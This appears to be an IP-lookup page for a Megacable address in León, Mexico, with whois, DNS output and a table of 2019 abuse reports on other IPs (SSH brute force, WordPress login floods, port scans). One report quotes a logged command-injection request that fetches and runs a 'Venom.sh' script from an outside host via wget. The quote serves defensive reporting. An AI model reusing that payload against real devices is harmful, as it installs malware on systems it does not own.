City: León de los Aldama
Region: Guanajuato
Country: Mexico
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
% IP Client: 124.223.158.242
% Joint Whois - whois.lacnic.net
% This server accepts single ASN, IPv4 or IPv6 queries
% LACNIC resource: whois.lacnic.net
% Copyright LACNIC lacnic.net
% The data below is provided for information purposes
% and to assist persons in obtaining information about or
% related to AS and IP numbers registrations
% By submitting a whois query, you agree to use this data
% only for lawful purposes.
% 2026-07-06 07:01:35 (-03 -03:00)
inetnum: 177.240.0.0/13
status: allocated
aut-num: N/A
owner: Mega Cable, S.A. de C.V.
ownerid: MX-MSCV17-LACNIC
responsible: Hector Javier Villa Montañez
address: Av. Lazaro Cardenas, 1694, Del Fresno
address: 44900 - Guadalajara - JA
country: MX
phone: +52 3337500020
owner-c: NIT
tech-c: NIT
abuse-c: NIM44
inetrev: 177.240.0.0/13
nserver: NS1.MEGARED.NET.MX
nsstat: 20260704 AA
nslastaa: 20260704
nserver: NS2.MEGARED.NET.MX
nsstat: 20260704 AA
nslastaa: 20260704
created: 20140326
changed: 20190925
nic-hdl: NIT
person: NIC TECH
e-mail: nic_tech@megacable.com.mx
address: Lazaro Cardenas, 1694, Del Fresno
address: 44900 - Guadalajara - Ja
country: MX
phone: +52 33 37500029
created: 20030303
changed: 20120105
nic-hdl: NIM44
person: NIC_Abuse Megacable
e-mail: nic_abuse@megacable.com.mx
address: Lazaro Cardenas, 1694, Colonia de Fresno
address: 44900 - Guadalajara - JA
country: MX
phone: +52 3396900000
created: 20190912
changed: 20190912
% whois.lacnic.net accepts only direct match queries.
% Types of queries are: POCs, ownerid, CIDR blocks, IP
% and AS numbers.
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 177.245.226.172
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 4795
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;177.245.226.172. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2026070600 1800 900 604800 86400
;; Query time: 8 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Jul 06 18:01:35 CST 2026
;; MSG SIZE rcvd: 108
172.226.245.177.in-addr.arpa domain name pointer customer-LEON-CGN-226-172.megared.net.mx.
Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
172.226.245.177.in-addr.arpa name = customer-LEON-CGN-226-172.megared.net.mx.
Authoritative answers can be found from:
| IP | Type | Details | Datetime |
|---|---|---|---|
| 94.102.49.65 | attackbotsspam | Dec 23 10:41:29 debian-2gb-nbg1-2 kernel: \[746835.847620\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=94.102.49.65 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=247 ID=9603 PROTO=TCP SPT=43758 DPT=31731 WINDOW=1024 RES=0x00 SYN URGP=0 |
2019-12-23 18:29:25 |
| 156.209.129.57 | attackspambots | Web Server Attack |
2019-12-23 18:21:56 |
| 128.199.218.137 | attackspam | Dec 22 23:52:39 auw2 sshd\[16329\]: Invalid user 123456 from 128.199.218.137 Dec 22 23:52:39 auw2 sshd\[16329\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=128.199.218.137 Dec 22 23:52:40 auw2 sshd\[16329\]: Failed password for invalid user 123456 from 128.199.218.137 port 51432 ssh2 Dec 22 23:59:10 auw2 sshd\[17009\]: Invalid user enameidc from 128.199.218.137 Dec 22 23:59:10 auw2 sshd\[17009\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=128.199.218.137 |
2019-12-23 18:06:08 |
| 104.248.16.13 | attackspam | 104.248.16.13 - - [23/Dec/2019:08:08:29 +0000] "POST /wp/wp-login.php HTTP/1.1" 200 6040 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 104.248.16.13 - - [23/Dec/2019:08:08:32 +0000] "POST /wp/wp-login.php HTTP/1.1" 200 5770 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" ... |
2019-12-23 18:35:07 |
| 106.248.41.245 | attack | Dec 23 09:24:07 cp sshd[14840]: Failed password for root from 106.248.41.245 port 46774 ssh2 Dec 23 09:24:07 cp sshd[14840]: Failed password for root from 106.248.41.245 port 46774 ssh2 |
2019-12-23 18:00:16 |
| 197.60.160.241 | attackbotsspam | 1 attack on wget probes like: 197.60.160.241 - - [22/Dec/2019:11:18:46 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-12-23 18:38:07 |
| 189.198.134.146 | attackspam | Unauthorized connection attempt detected from IP address 189.198.134.146 to port 445 |
2019-12-23 18:03:33 |
| 116.86.166.93 | attackspambots | SSH Bruteforce attack |
2019-12-23 18:32:15 |
| 46.29.79.57 | attackbots | spam |
2019-12-23 18:27:33 |
| 124.40.244.199 | attackspambots | [Aegis] @ 2019-12-23 10:47:57 0000 -> Attempted Administrator Privilege Gain: ET SCAN LibSSH Based Frequent SSH Connections Likely BruteForce Attack |
2019-12-23 18:29:02 |
| 62.234.95.148 | attackspam | Dec 23 09:16:43 server sshd\[27441\]: Invalid user cernada from 62.234.95.148 Dec 23 09:16:43 server sshd\[27441\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=62.234.95.148 Dec 23 09:16:45 server sshd\[27441\]: Failed password for invalid user cernada from 62.234.95.148 port 36929 ssh2 Dec 23 09:27:44 server sshd\[30337\]: Invalid user poffel from 62.234.95.148 Dec 23 09:27:44 server sshd\[30337\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=62.234.95.148 ... |
2019-12-23 18:02:21 |
| 103.25.0.202 | attack | [ES hit] Tried to deliver spam. |
2019-12-23 18:12:33 |
| 35.229.206.214 | attackspam | port scan and connect, tcp 1433 (ms-sql-s) |
2019-12-23 18:13:28 |
| 52.91.189.243 | attackspambots | BadRequests |
2019-12-23 18:36:43 |
| 162.241.139.106 | attack | Dec 23 01:13:32 debian sshd[17554]: Unable to negotiate with 162.241.139.106 port 44060: no matching key exchange method found. Their offer: diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 [preauth] Dec 23 01:27:24 debian sshd[18130]: Unable to negotiate with 162.241.139.106 port 39978: no matching key exchange method found. Their offer: diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 [preauth] ... |
2019-12-23 18:23:43 |